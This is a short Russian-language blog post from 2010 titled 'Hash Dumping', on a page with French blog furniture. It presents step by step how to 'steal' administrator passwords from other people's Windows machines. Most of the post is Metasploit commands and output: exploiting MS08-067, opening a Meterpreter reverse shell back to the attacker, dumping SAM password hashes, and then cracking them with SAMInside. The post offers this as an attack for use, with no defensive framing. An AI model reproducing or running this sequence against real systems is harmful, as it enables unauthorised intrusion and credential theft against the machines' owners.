samedi 20 février 2010

Hash Dumping

В этой статье мы расскажем и покажем как тырить администраторские пароли с чужих тачек с помощью MSF.

С самого начала предположим, что машина, с которой нужно угнать пароли, слаба на ms08_067_netapi exploit. Это так для примера, главное на тачку попасть. Итак :
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.120

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.151

msf exploit(ms08_067_netapi) > set LPORT 4444

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.120:1041)

Итак мы в тачке. Теперь займемся собственно делом :
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 3ed7[...]
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:...
Guest:501:aad3b435b51404eeaad3b435b51404ee:...
HelpAssistant:1000:ce909bd50f46021bf4aa40680422f646:...
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:...::

Хэши у нас в руках. Загоняем их в SamInside и через несколько минут пароли у нас на руках. Вот так :)

$vz00r

Aucun commentaire:

Enregistrer un commentaire